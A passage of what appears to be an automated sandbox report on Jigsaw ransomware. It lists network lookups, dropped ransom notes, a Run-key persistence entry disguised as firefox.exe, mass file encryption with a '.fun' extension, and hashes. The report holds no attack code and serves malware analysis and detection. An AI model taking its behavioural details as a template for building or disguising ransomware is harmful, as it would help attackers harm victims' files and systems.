FR 178.33.163.179:6893 udp
FR 178.33.163.180:6893 udp
FR 178.33.163.181:6893 udp
FR 178.33.163.182:6893 udp
FR 178.33.163.183:6893 udp
FR 178.33.163.184:6893 udp
FR 178.33.163.185:6893 udp
FR 178.33.163.186:6893 udp
FR 178.33.163.187:6893 udp
FR 178.33.163.188:6893 udp
FR 178.33.163.189:6893 udp
FR 178.33.163.190:6893 udp
FR 178.33.163.191:6893 udp
FR 178.33.163.192:6893 udp
FR 178.33.163.193:6893 udp
FR 178.33.163.194:6893 udp
FR 178.33.163.195:6893 udp
FR 178.33.163.196:6893 udp
FR 178.33.163.197:6893 udp
FR 178.33.163.198:6893 udp
FR 178.33.163.199:6893 udp
FR 178.33.163.200:6893 udp
FR 178.33.163.201:6893 udp
FR 178.33.163.202:6893 udp
FR 178.33.163.203:6893 udp
FR 178.33.163.204:6893 udp
FR 178.33.163.205:6893 udp
FR 178.33.163.206:6893 udp
FR 178.33.163.207:6893 udp
FR 178.33.163.208:6893 udp
FR 178.33.163.209:6893 udp
FR 178.33.163.210:6893 udp
FR 178.33.163.211:6893 udp
FR 178.33.163.212:6893 udp
FR 178.33.163.213:6893 udp
FR 178.33.163.214:6893 udp
FR 178.33.163.215:6893 udp
FR 178.33.163.216:6893 udp
FR 178.33.163.217:6893 udp
FR 178.33.163.218:6893 udp
FR 178.33.163.219:6893 udp
FR 178.33.163.220:6893 udp
FR 178.33.163.221:6893 udp
FR 178.33.163.222:6893 udp
FR 178.33.163.223:6893 udp
FR 178.33.163.224:6893 udp
FR 178.33.163.225:6893 udp
FR 178.33.163.226:6893 udp
FR 178.33.163.227:6893 udp
FR 178.33.163.228:6893 udp
FR 178.33.163.229:6893 udp
FR 178.33.163.230:6893 udp
FR 178.33.163.231:6893 udp
FR 178.33.163.232:6893 udp
FR 178.33.163.233:6893 udp
FR 178.33.163.234:6893 udp
FR 178.33.163.235:6893 udp
FR 178.33.163.236:6893 udp
FR 178.33.163.237:6893 udp
FR 178.33.163.238:6893 udp
FR 178.33.163.239:6893 udp
FR 178.33.163.240:6893 udp
FR 178.33.163.241:6893 udp
FR 178.33.163.242:6893 udp
FR 178.33.163.243:6893 udp
FR 178.33.163.244:6893 udp
FR 178.33.163.245:6893 udp
FR 178.33.163.246:6893 udp
FR 178.33.163.247:6893 udp
FR 178.33.163.248:6893 udp
FR 178.33.163.249:6893 udp
FR 178.33.163.250:6893 udp
FR 178.33.163.251:6893 udp
FR 178.33.163.252:6893 udp
FR 178.33.163.253:6893 udp
FR 178.33.163.254:6893 udp
FR 178.33.163.255:6893 udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 75.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 101.209.201.84.in-addr.arpa udp

Files

memory/1884-0-0x00000000020A0000-0x00000000020D1000-memory.dmp

memory/1884-1-0x0000000000400000-0x0000000000435000-memory.dmp

memory/1884-2-0x0000000000400000-0x0000000000435000-memory.dmp

memory/1884-4-0x0000000000400000-0x0000000000435000-memory.dmp

memory/1884-7-0x0000000000400000-0x0000000000435000-memory.dmp

memory/1884-11-0x0000000000400000-0x0000000000435000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\OneNote\16.0\_R_E_A_D___T_H_I_S___2WZT_.txt

MD5 cd0bfe92ab9fdaf5fc4076aed9c61fb5
SHA1 5def31a85967503bbbe5e8b30215561b690d2a8c
SHA256 82dce026e8e37c120c2ed6469b545e642d154cf99e4aef4941229ff51b959e5a
SHA512 03fce969deea9463d694190725081b9a4a593d7e10ffd19dd2779b9f040ae218720e7da59d7ddb5db0fb0b7127b90f43125b70edac267189416b11c3036eee02

C:\Users\Admin\AppData\Roaming\Microsoft\OneNote\16.0\_R_E_A_D___T_H_I_S___4KPJV2_.hta

MD5 5d033305c1110f9775541e699dd4c418
SHA1 6dc053ed4d01aa86938f74a6cd8cfed370c469f8
SHA256 c200f5b609106ebe5583350feb4e939a83891c07a7427bba76a3a80af17516b9
SHA512 d8bceb067032ab087c9417d68db8024ec45abac842bfaad0ce1d38474726970bb7adf7cc2c47b5cc897b6cd8a065a74174db732cedd0f60a6e563c1169dce03f

memory/1884-339-0x0000000000400000-0x0000000000435000-memory.dmp

memory/1884-344-0x0000000000400000-0x0000000000435000-memory.dmp

memory/1884-370-0x0000000000400000-0x0000000000435000-memory.dmp

memory/1884-371-0x0000000000440000-0x0000000000451000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\jigsaw.exe"

Signatures

Jigsaw Ransomware

ransomware jigsaw

Jigsaw family

jigsaw

Renames multiple (3755) files with added filename extension

ransomware

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\jigsaw.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Local\Temp\jigsaw.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\japanese_over.png.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNotebookLargeTile.scale-200.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailAppList.targetsize-16.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\Background_Safety_Objects.jpg C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\SplashScreen.scale-125_contrast-black.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-256_altform-unplated.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\EmptySearch.scale-400.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\GenericMailSmallTile.scale-200.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_2019.729.2301.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\Background_RoomTracing_03.jpg C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\FileExtension.targetsize-64.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\accessibility_poster.jpg.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\root\ui-strings.js.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\dd_arrow_small.png.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-96_altform-unplated_contrast-white.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_highcontrast_retina.png.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\subscription_intro\save-money.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\OrientationControlFrontIndicatorHover.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\da-dk\ui-strings.js.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Square44x44Logo.targetsize-72.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare71x71Logo.scale-200_contrast-white.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\LinkedInboxWideTile.scale-400.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\et.txt C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-60_contrast-white.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailBadge.scale-400.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\logo_retina.png.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pt-br\ui-strings.js.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ui-strings.js.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionGroupSmallTile.scale-400.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-24_altform-unplated.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\export.svg.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ru-ru\ui-strings.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\new_icons.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-24.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\Images\Ratings\Yelp6.scale-100.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgePackages.h.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-gb\ui-strings.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Win10\MicrosoftSolitaireAppList.targetsize-256_altform-unplated_devicefamily-colorfulunplated.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-24_altform-unplated_contrast-white.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteMediumTile.scale-100.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ja-jp\ui-strings.js.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxAccountsLargeTile.scale-100.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\basicstylish.dotx C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner-2x.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\Icons\icon_done.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\ui.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-20_altform-lightunplated.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-40.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\AppCS\Assets\EmptyVideoProjectCreations_LightTheme.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ru-ru\ui-strings.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.targetsize-40.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\ExchangeLargeTile.scale-150.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\lv_get.svg.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\example_icons2x.png.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\pt-br\ui-strings.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-GoogleCloudCache.scale-150.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-48_altform-unplated.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\Assets\Square44x44Logo.targetsize-16_altform-lightunplated.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-256.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteAppList.targetsize-16_altform-unplated.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4660 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Local\Temp\jigsaw.exe C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe
PID 4660 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Local\Temp\jigsaw.exe C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe

Processes

C:\Users\Admin\AppData\Local\Temp\jigsaw.exe

"C:\Users\Admin\AppData\Local\Temp\jigsaw.exe"

C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe

"C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\AppData\Local\Temp\jigsaw.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 107.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 168.253.116.51.in-addr.arpa udp

Files

memory/4660-0-0x00007FFCC0775000-0x00007FFCC0776000-memory.dmp

memory/4660-1-0x00007FFCC04C0000-0x00007FFCC0E61000-memory.dmp

memory/4660-2-0x000000001B2D0000-0x000000001B308000-memory.dmp

memory/4660-4-0x000000001B8E0000-0x000000001BDAE000-memory.dmp

memory/4660-3-0x00007FFCC04C0000-0x00007FFCC0E61000-memory.dmp

memory/4660-5-0x000000001BDB0000-0x000000001BE4C000-memory.dmp

C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe

MD5 2773e3dc59472296cb0024ba7715a64e
SHA1 27d99fbca067f478bb91cdbcb92f13a828b00859
SHA256 3ae96f73d805e1d3995253db4d910300d8442ea603737a1428b613061e7f61e7
SHA512 6ef530b209f8ec459cca66dbf2c31ec96c5f7d609f17fa3b877d276968032fbc6132ea4a45ed1450fb6c5d730a7c9349bf4481e28befaea6b119ec0ded842262

memory/4988-20-0x00007FFCC04C0000-0x00007FFCC0E61000-memory.dmp

memory/4988-21-0x00007FFCC04C0000-0x00007FFCC0E61000-memory.dmp

memory/4660-19-0x00007FFCC04C0000-0x00007FFCC0E61000-memory.dmp

memory/4988-22-0x00000000015C0000-0x00000000015C8000-memory.dmp

memory/4988-23-0x00007FFCC04C0000-0x00007FFCC0E61000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{5E3C208F-1611-4682-AD27-B72E2F58B403} - OProcSessId.dat.fun

MD5 8ebcc5ca5ac09a09376801ecdd6f3792
SHA1 81187142b138e0245d5d0bc511f7c46c30df3e14
SHA256 619e246fc0ac11320ff9e322a979948d949494b0c18217f4d794e1b398818880
SHA512 cec50bfc6ad2f57f16da99459f40f2d424c6d5691685fa1053284f46c8c8c8a975d7bcb1f3521c4f3fbdc310cf4714e29404aa23be6021e2e267c97b090dc650

C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\invalid32x32.gif.fun

MD5 580ee0344b7da2786da6a433a1e84893
SHA1 60f8c4dd5457e9834f5402cb326b1a2d3ca0ba7e
SHA256 98b6c2ddfefc628d03ceaef9d69688674a6bc32eb707f9ed86bc8c75675c4513
SHA512 356d2cdea3321e894b5b46ad1ea24c0e3c8be8e3c454b5bd300b7340cbb454e71fc89ca09ea0785b373b483e67c2f6f6bb408e489b0de4ff82d5ed69a75613ba

C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt.fun

MD5 829165ca0fd145de3c2c8051b321734f
SHA1 f5cc3af85ab27c3ea2c2f7cbb8295b28a76a459e
SHA256 a193ee2673e0ba5ebc5ea6e65665b8a28bd7611f06d2b0174ec2076e22d94356
SHA512 7d380cda12b342a770def9d4e9c078c97874f3a30cd9f531355e3744a8fef2308f79878ffeb12ce26953325cb6a17bc7e54237dfdc2ee72b140ec295676adbcb

C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\settings.dat.fun

MD5 f22599af9343cac74a6c5412104d748c
SHA1 e2ac4c57fa38f9d99f3d38c2f6582b4334331df5
SHA256 36537e56d60910ab6aa548e64ca4adafdcabde9d60739013993e12ba061dfd65
SHA512 5c8afc025e1d8342d93b7842dc7ef22eca61085857a80a08ba9b3f156ee3b814606bb32bc244bd525a7913e7915bdf3a86771d39577f4a1176ade04dc381c6d4

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727656156761623.txt.fun

MD5 e942e3a63767b2fbc70741ba7e10a3ca
SHA1 591961d3e60f3939751f6a2a34333de5e03a3a7c
SHA256 c76775bdd67677b96662d33907f21377ec6c0f4d54d196e082ade5b64b1f43c1
SHA512 a678d0cd50297f4823aa48bb6728dbc603dff42fc385ce6bcfd341df953c6d329c2e22a46e4b0370b69bace9549565d6cdd9d95d025d6d88d9c952263350d3c0

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727658166467731.txt.fun

MD5 9445a004b034d04ad52da34823263511
SHA1 c322862db0094359fb272d1c90d5158ea26a032a
SHA256 a94334d04a574d8bb9427c7bab51e37b5d2dd7c8e8edde4ba746989c66acd891
SHA512 bfb9e07e12e04951deb52f452f2552bbf8be7993cf89544bbdeacbb55d333887e9452abc46cd8a42e10198d327e25aa29227c2c352790bcfb0263795366a2382

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727664132098124.txt.fun

MD5 ba2bbe2cda90e55b7457b8c6d6db9d1a
SHA1 e4742f659fd4453bf11ef860c06095944747f9bf
SHA256 5ef6411e9b665dc62915e501e7c9c83e959b37fb848b19c220a0a3626217c394
SHA512 4b87ceff65e205e1e0bca7dbf0bec88ca478ff9ad2510e4b7079cdf4dbae762f310de52a4584e707a972c0a365570b4c4e1fbb98368562515ee6db9fd19628ff

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133773071192975345.txt.fun

MD5 c9ba3a70aa47b7e7bf0156abe0025f68
SHA1 7c3bbadfb327f4d28bd5f6bccb6674d29b1226fa
SHA256 d07ae2a4ea0849f3c18a1a707e2c4df8bc91d3eb02010254c51de8f7c484405b
SHA512 bf82ece30a55f75073c9f7bc3cdba774458824cbdbe0c8e7aaf76c6092c0592b7f32c38602a5eceb52dde59db6be3a590bf2e3d51b8d50161c6cf2089bd55e08

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_remove_18.svg.fun

MD5 75a585c1b60bd6c75d496d3b042738d5
SHA1 02c310d7bf79b32a43acd367d031b6a88c7e95ed
SHA256 5ebbfc6df60e21044486a5df3cb47ccdcd7a4d5f197804555715ffd9bf6c5834
SHA512 663a302e651b9167f4c4e6ae30028307b4d8da0dda3a0e5fd414104951d50419862fc9396c5b39fe5c4b696efd3efbf0b575688983b1d341f3ef38becf500505

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png.fun

MD5 880833ad1399589728c877f0ebf9dce0
SHA1 0a98c8a78b48c4b1b4165a2c6b612084d9d26dce
SHA256 7a27d891097df183fbf0031e3894bdac0ce77aef15d666ddd9f6a04e9836fb27
SHA512 0ddf247892a72a390437390d535debf6e41d12e51b31eb4f0353b710ec380c5fbc531a48e76935088063a41aca843287d3def9c1cd46be05b8dcb69f5017a464

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png.fun

MD5 409a8070b50ad164eda5691adf5a2345
SHA1 e84e10471f3775d5d706a3b7e361100c9fbfaf74
SHA256 a91790b778026db625c9dedfe1c6d94b884818b33d7977e86b2f9c2f3c500796
SHA512 767a75edd37d29b3433040ce21cda849cd11ba549f27581f7edc6416c433ba7047c56908d40956422393ab0f35ede61617d4bd2aad0bde3d1ebd276584c858c7

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover_2x.png.fun

MD5 e092d14d26938d98728ce4698ee49bc3
SHA1 9f8ee037664b4871ec02ed6bba11a5317b9e784a
SHA256 5e8ec278a273be22199884d519a79f748801baa3a45b76e57569fdfffe96e7fb
SHA512 b2fcb5d46339cdf6b5a954f2a083cf913779e57cb6e8699bc5da1fba1c370c41117b7ddefb50075622067eb7b02a20268bc047171bd883bcda4a497c2ec64ea4

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover.png.fun

MD5 2884524604c89632ebbf595e1d905df9
SHA1 b6053c85110b0364766e18daab579ac048b36545
SHA256 ae2facd997527426fc4def82e0db68be29b44499bfff86a28c36f7c31b177d4f
SHA512 0b506397627823a1768796129c6b37d146821471b89338b5f2d0fd3aea707fd46a8e197ee0e298ddfb3b50eef0a0b064946006346b060f733ef19cbd5d24fc90

